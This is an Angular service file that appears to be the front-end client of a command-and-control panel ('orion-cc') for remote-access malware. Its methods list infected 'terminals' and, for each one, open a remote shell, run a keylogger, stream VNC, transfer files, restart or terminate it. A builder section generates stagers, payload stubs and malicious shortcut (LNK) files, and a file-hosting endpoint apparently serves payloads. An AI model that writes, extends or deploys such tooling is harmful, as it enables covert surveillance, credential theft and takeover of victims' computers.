import {Inject, Injectable, InjectionToken} from '@angular/core';
import {HttpClient, HttpErrorResponse, HttpHeaders, HttpParams, HttpResponse} from '@angular/common/http';
import {catchError, first, Observable, throwError} from 'rxjs';
import {NewResponse, ResponseLNKAndStager} from './models/response';
import {TerminalModel} from './models/terminal.model';
import {Response} from '../../../src/app/shared/model/response.model';
import {BuilderStubModel, ShellLinkModel} from './models/builder.model';
import {timeout} from 'rxjs/operators';
import {FileHostingModel} from './models/file-hosting.model';

export const API_URL = new InjectionToken<string>('apiUrl');

@Injectable()
export class TerminalService {
  private readonly urlHealthz: string;
  private readonly urlTerminal: string;
  private readonly urlBuilder: string;
  private readonly urlFileHosting: string;

  private readonly headersSkippingInterceptor: HttpHeaders;
  private readonly headers: HttpHeaders;
  private readonly optionsSkippingInterceptor: object;
  private readonly options: object;

  public constructor(private http: HttpClient, @Inject(API_URL) private apiUrl: string) {
    this.headersSkippingInterceptor = new HttpHeaders({
      'Content-Type': 'application/json',
      'skipInterceptor': 'true',
    });
    this.headers = new HttpHeaders({
      'Content-Type': 'application/json',
    });

    this.optionsSkippingInterceptor = {
      headers: this.headersSkippingInterceptor,
      withCredentials: true
    };
    this.options = {
      headers: this.headers,
      withCredentials: true
    };

    this.urlTerminal = `${apiUrl}/orion-cc`;
    this.urlHealthz = `${apiUrl}/orion-cc/healthz`;
    this.urlBuilder = `${apiUrl}/orion-cc/builder`;
    this.urlFileHosting = `${apiUrl}/orion-cc/fileHosting`;
  }

  // Health
  public getHealthz(): Observable<Response<string>> {
    return this.http.get<Response<string>>(`${this.urlHealthz}`,this.optionsSkippingInterceptor).pipe(first());
  }

  // Terminal
  public getAllTerminals(page: number, size: number): Observable<NewResponse<TerminalModel[]>> {
    return this.http.get<NewResponse<TerminalModel[]>>(`${this.urlTerminal}/getAll?page=${page}&size=${size}`, this.optionsSkippingInterceptor).pipe(first());
    // return of({
    //   succeed: true,
    //   errors: [],
    //   value: {
    //     totalCount: 1,
    //     entities: [{
    //       terminalId: '340196cd-54a2-46c9-830c-6c413314acbc',
    //       name: 'Terminal testL',
    //     }],
    //     hasNextPage: false,
    //     hasPreviousPage: false,
    //     pageIndex: 1,
    //     pageSize: 200,
    //     totalPages: 1,
    //   }
    // });
  }

  public getTerminal(terminalId: string): Observable<Response<TerminalModel>> {
    return this.http.get<Response<TerminalModel>>(`${this.urlTerminal}/${terminalId}`, this.optionsSkippingInterceptor).pipe(
      first(),
      catchError(this.handleError));
    // return of({
    //   succeed: true,
    //   errors: [],
    //   value: {
    //     terminalId,
    //     name: 'terminal nameee',
    //   },
    // }).pipe(delay(1000));
  }

  private handleError(error: HttpErrorResponse) {
    if (error.status === 404) {
      return throwError(error);
    }
    return throwError('Something went wrong.');
  }

  public updateTerminal(terminalId: string, name: string, countryCode: string): Observable<Response<null>> {
    const body = {
      name,
      countryCode
    }
    return this.http.put<Response<null>>(`${this.urlTerminal}/${terminalId}`, body, this.optionsSkippingInterceptor).pipe(first());
  }

  public restartTerminal(terminalId: string,): Observable<Response<string>> {
    return this.http.get<Response<string>>(`${this.urlTerminal}/${terminalId}/restart`, this.optionsSkippingInterceptor).pipe(first());
  }

  public getTerminalShell(terminalId: string,): Observable<Response<string>> {
    return this.http.get<Response<string>>(`${this.urlTerminal}/${terminalId}/shell`, this.optionsSkippingInterceptor).pipe(first());
  }

  public terminateTerminal(terminalId: string): Observable<Response<null>> {
    return this.http.get<Response<null>>(`${this.urlTerminal}/${terminalId}/terminate`, this.optionsSkippingInterceptor).pipe(first());
  }

  public syncTerminal(terminalId: string): Observable<Response<null>> {
    return this.http.get<Response<null>>(`${this.urlTerminal}/${terminalId}/sync`, this.optionsSkippingInterceptor).pipe(first());
  }

  public fileTransfer(terminalId: string): Observable<Response<null>> {
    return this.http.get<Response<null>>(`${this.urlTerminal}/${terminalId}/filetransfer`, this.optionsSkippingInterceptor).pipe(first());
  }

  public keylogger(terminalId: string): Observable<Response<string>> {
    return this.http.get<Response<string>>(`${this.urlTerminal}/${terminalId}/keylogger`, this.optionsSkippingInterceptor).pipe(first());
  }

  public getVNCStreamId(terminalId: string): Observable<Response<string>> {
    return this.http.get<Response<string>>(`${this.urlTerminal}/${terminalId}/vnc`, this.optionsSkippingInterceptor).pipe(first());
  }

  //File hosting
  public postFileHosting(body: FileHostingModel): Observable<string> {
    return this.http.post<string>(`${this.urlFileHosting}`, body, {
      ...this.optionsSkippingInterceptor,
      responseType: 'text' as 'json',
    }).pipe(
      first(),
      timeout(5 * 60 * 1000), // 5 minutes timeout in milliseconds
      catchError(error => {
        if (error.name === 'TimeoutError') {
          return throwError('Request timed out');
        }
        return throwError(error);
      }));
  }

  //Builder

  public generateStagers(): Observable<HttpResponse<Blob>> {
    return this.http.post(`${this.urlBuilder}/Stager`, {}, {
      responseType: 'blob',
      observe: 'response',
      withCredentials: true,
      headers: this.headersSkippingInterceptor,
      params: new HttpParams(),
    }).pipe(first());
  }

  public stub(body: BuilderStubModel): Observable<Response<ResponseLNKAndStager>> {
    return this.http.post<Response<ResponseLNKAndStager>>(`${this.urlBuilder}/stub`, body, this.optionsSkippingInterceptor).pipe(
      first(),
      timeout(5 * 60 * 1000), // 5 minutes timeout in milliseconds
      catchError(error => {
        if (error.name === 'TimeoutError') {
          return throwError('Request timed out');
        }
        return throwError(error);
      }));
  }

  public createShellLink(body: ShellLinkModel): Observable<ResponseLNKAndStager> {
    return this.http.post<ResponseLNKAndStager>(`${this.urlBuilder}/ShellLink`, body, this.optionsSkippingInterceptor).pipe(
      first(),
      timeout(5 * 60 * 1000), // 5 minutes timeout in milliseconds
      catchError(error => {
        if (error.name === 'TimeoutError') {
          return throwError('Request timed out');
        }
        return throwError(error);
      }));
  }
}
